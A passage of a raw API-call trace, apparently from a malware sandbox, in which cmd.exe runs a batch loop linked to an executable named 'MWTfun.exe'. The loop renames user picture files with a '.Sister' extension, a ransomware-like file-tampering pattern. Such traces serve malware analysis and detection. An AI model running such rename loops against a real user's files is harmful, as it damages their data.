lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0292.648] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.649] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.649] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.649] malloc (_Size=0xffce) returned 0x21ed97dfbc0 [0292.649] ??_V@YAXPEAX@Z () returned 0x21ed97dfbc0 [0292.649] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0292.649] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0292.649] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0292.649] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0292.649] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0292.649] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0292.649] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0292.649] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0292.649] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0292.649] ??_V@YAXPEAX@Z () returned 0x1 [0292.649] GetProcessHeap () returned 0x21ed8c70000 [0292.649] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f980 [0292.650] GetProcessHeap () returned 0x21ed8c70000 [0292.650] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f980, Size=0x130) returned 0x21ed8d626d0 [0292.650] GetProcessHeap () returned 0x21ed8c70000 [0292.650] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d626d0) returned 0x130 [0292.650] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.650] malloc (_Size=0xffce) returned 0x21ed97dfbc0 [0292.650] ??_V@YAXPEAX@Z () returned 0x21ed97dfbc0 [0292.650] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.650] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed97dfbc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0292.655] ??_V@YAXPEAX@Z () returned 0x1 [0292.655] GetProcessHeap () returned 0x21ed8c70000 [0292.655] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62e50 [0292.655] GetProcessHeap () returned 0x21ed8c70000 [0292.656] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f4c0 [0292.656] GetProcessHeap () returned 0x21ed8c70000 [0292.656] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f4c0, Size=0x130) returned 0x21ed8d62310 [0292.656] GetProcessHeap () returned 0x21ed8c70000 [0292.656] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62310) returned 0x130 [0292.656] malloc (_Size=0xffce) returned 0x21ed97dfbc0 [0292.656] ??_V@YAXPEAX@Z () returned 0x21ed97dfbc0 [0292.656] GetProcessHeap () returned 0x21ed8c70000 [0292.656] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cbe0 [0292.656] GetProcessHeap () returned 0x21ed8c70000 [0292.656] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d32140 [0292.656] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0292.656] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0292.656] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.656] GetLastError () returned 0x2 [0292.657] GetProcessHeap () returned 0x21ed8c70000 [0292.657] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8ca6f30 [0292.659] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8ca6f40 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.659] SetErrorMode (uMode=0x0) returned 0x0 [0292.659] SetErrorMode (uMode=0x1) returned 0x0 [0292.659] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed97dfbc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0292.659] SetErrorMode (uMode=0x0) returned 0x1 [0292.659] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0292.659] GetProcessHeap () returned 0x21ed8c70000 [0292.659] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30670 [0292.660] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0292.660] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0292.660] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.660] GetLastError () returned 0x2 [0292.660] ??_V@YAXPEAX@Z () returned 0x1 [0292.660] malloc (_Size=0xffce) returned 0x21ed97dfbc0 [0292.660] ??_V@YAXPEAX@Z () returned 0x21ed97dfbc0 [0292.660] malloc (_Size=0xffce) returned 0x21ed97efba0 [0292.660] ??_V@YAXPEAX@Z () returned 0x21ed97efba0 [0292.660] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.660] GetLastError () returned 0x2 [0292.660] _get_osfhandle (_FileHandle=2) returned 0x54 [0292.660] GetFileType (hFile=0x54) returned 0x2 [0292.660] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0292.661] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0292.661] _get_osfhandle (_FileHandle=2) returned 0x54 [0292.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0292.662] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0292.662] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0292.662] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0292.669] longjmp () [0292.669] ??_V@YAXPEAX@Z () returned 0x1 [0292.669] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c00470, ftCreationTime.dwHighDateTime=0x1d5e3de, ftLastAccessTime.dwLowDateTime=0x7d12ada0, ftLastAccessTime.dwHighDateTime=0x1d5e8ad, ftLastWriteTime.dwLowDateTime=0x7d12ada0, ftLastWriteTime.dwHighDateTime=0x1d5e8ad, nFileSizeHigh=0x0, nFileSizeLow=0xe23a, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Cm2WieoPB7gN.png", cAlternateFileName="")) returned 1 [0292.669] GetProcessHeap () returned 0x21ed8c70000 [0292.669] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63f50, Size=0x82) returned 0x21ed9379c90 [0292.669] GetProcessHeap () returned 0x21ed8c70000 [0292.669] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379c90) returned 0x82 [0292.669] GetProcessHeap () returned 0x21ed8c70000 [0292.669] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cb6f20 [0292.670] GetProcessHeap () returned 0x21ed8c70000 [0292.670] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cb6f20, Size=0x30) returned 0x21ed8cb6f20 [0292.670] GetProcessHeap () returned 0x21ed8c70000 [0292.670] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cb6f20) returned 0x30 [0292.670] GetProcessHeap () returned 0x21ed8c70000 [0292.670] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cb6f60 [0292.670] malloc (_Size=0x1ff9c) returned 0x21ed97ffb80 [0292.671] GetProcessHeap () returned 0x21ed8c70000 [0292.671] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8a90 [0292.671] ??_V@YAXPEAX@Z () returned 0x1 [0292.671] GetProcessHeap () returned 0x21ed8c70000 [0292.671] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cb6f60, Size=0x180) returned 0x21ed8cb6f60 [0292.671] GetProcessHeap () returned 0x21ed8c70000 [0292.671] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cb6f60) returned 0x180 [0292.671] GetProcessHeap () returned 0x21ed8c70000 [0292.671] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cb70f0 [0292.671] GetProcessHeap () returned 0x21ed8c70000 [0292.671] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cb70f0, Size=0x290) returned 0x21ed8cb70f0 [0292.671] GetProcessHeap () returned 0x21ed8c70000 [0292.672] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cb70f0) returned 0x290 [0292.672] GetProcessHeap () returned 0x21ed8c70000 [0292.672] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cb7390 [0292.672] GetProcessHeap () returned 0x21ed8c70000 [0292.672] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cb7390, Size=0x30) returned 0x21ed8cb7390 [0292.672] GetProcessHeap () returned 0x21ed8c70000 [0292.672] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cb7390) returned 0x30 [0292.672] GetProcessHeap () returned 0x21ed8c70000 [0292.672] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cb73d0 [0292.672] malloc (_Size=0x1ff9c) returned 0x21ed97ffb80 [0292.672] GetProcessHeap () returned 0x21ed8c70000 [0292.672] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8ad0 [0292.672] ??_V@YAXPEAX@Z () returned 0x1 [0292.672] malloc (_Size=0x1ff9c) returned 0x21ed97ffb80 [0292.672] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cc40 [0292.673] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0292.673] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cf40 [0292.673] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0292.673] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd905513f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd905513f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7ce20 [0292.674] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0292.674] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Cm2WieoPB7gN.png", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c00470, ftCreationTime.dwHighDateTime=0x1d5e3de, ftLastAccessTime.dwLowDateTime=0x7d12ada0, ftLastAccessTime.dwHighDateTime=0x1d5e8ad, ftLastWriteTime.dwLowDateTime=0x7d12ada0, ftLastWriteTime.dwHighDateTime=0x1d5e8ad, nFileSizeHigh=0x0, nFileSizeLow=0xe23a, dwReserved0=0x4, dwReserved1=0x7, cFileName="Cm2WieoPB7gN.png", cAlternateFileName="CM2WIE~1.PNG")) returned 0x21ed8c7c9a0 [0292.674] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.674] _wcsnicmp (_String1="CM2WIE~1.PNG", _String2="Cm2WieoPB7gN.png", _MaxCount=0x10) returned 15 [0292.675] malloc (_Size=0x1ff9c) returned 0x21ed981fb30 [0292.675] ??_V@YAXPEAX@Z () returned 0x21ed981fb30 [0292.676] GetProcessHeap () returned 0x21ed8c70000 [0292.676] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed8cc8810 [0292.677] ??_V@YAXPEAX@Z () returned 0x1 [0292.677] ??_V@YAXPEAX@Z () returned 0x1 [0292.677] GetProcessHeap () returned 0x21ed8c70000 [0292.677] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cb73d0, Size=0x180) returned 0x21ed8cb73d0 [0292.677] GetProcessHeap () returned 0x21ed8c70000 [0292.677] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cb73d0) returned 0x180 [0292.677] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0292.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.677] GetFileType (hFile=0x50) returned 0x2 [0292.677] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.677] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0292.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.678] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0292.684] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.685] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.685] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0292.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.685] GetFileType (hFile=0x50) returned 0x2 [0292.685] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.685] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0292.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.685] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0292.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.686] GetFileType (hFile=0x50) returned 0x2 [0292.686] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.686] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.687] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cb6f30*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cb6f30*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.687] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Cm2WieoPB7gN.png\" \"Cm2WieoPB7gN.png.Sister\" ") returned 46 [0292.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.687] GetFileType (hFile=0x50) returned 0x2 [0292.687] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.687] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.688] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2e) returned 1 [0292.688] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0292.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.688] GetFileType (hFile=0x50) returned 0x2 [0292.689] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.689] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.689] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.690] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0292.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.690] GetFileType (hFile=0x50) returned 0x2 [0292.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.690] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.690] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0292.691] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0292.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.691] GetFileType (hFile=0x50) returned 0x2 [0292.691] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.691] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.692] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0292.693] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0292.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.693] GetFileType (hFile=0x50) returned 0x2 [0292.694] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.694] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.694] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0292.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.699] GetFileType (hFile=0x50) returned 0x2 [0292.699] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.699] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.700] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cb73a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cb73a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.700] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.bat\" ") returned 46 [0292.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.701] GetFileType (hFile=0x50) returned 0x2 [0292.701] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.701] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.701] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2e) returned 1 [0292.704] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0292.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.704] GetFileType (hFile=0x50) returned 0x2 [0292.704] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.704] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0292.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.704] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0292.709] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.709] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.710] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.710] malloc (_Size=0xffce) returned 0x21ed97ffb80 [0292.710] ??_V@YAXPEAX@Z () returned 0x21ed97ffb80 [0292.710] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0292.710] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0292.710] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0292.710] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0292.710] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0292.710] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0292.710] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0292.710] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0292.710] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0292.710] ??_V@YAXPEAX@Z () returned 0x1 [0292.710] GetProcessHeap () returned 0x21ed8c70000 [0292.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc8) returned 0x21ed8d6ab00 [0292.711] GetProcessHeap () returned 0x21ed8c70000 [0292.711] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6ab00, Size=0x6c) returned 0x21ed8d67bb0 [0292.711] GetProcessHeap () returned 0x21ed8c70000 [0292.711] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67bb0) returned 0x6c [0292.711] GetProcessHeap () returned 0x21ed8c70000 [0292.711] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67ab0 [0292.711] GetProcessHeap () returned 0x21ed8c70000 [0292.711] RtlAllocateHeap (HeapHandle=0x21ed8c70000, 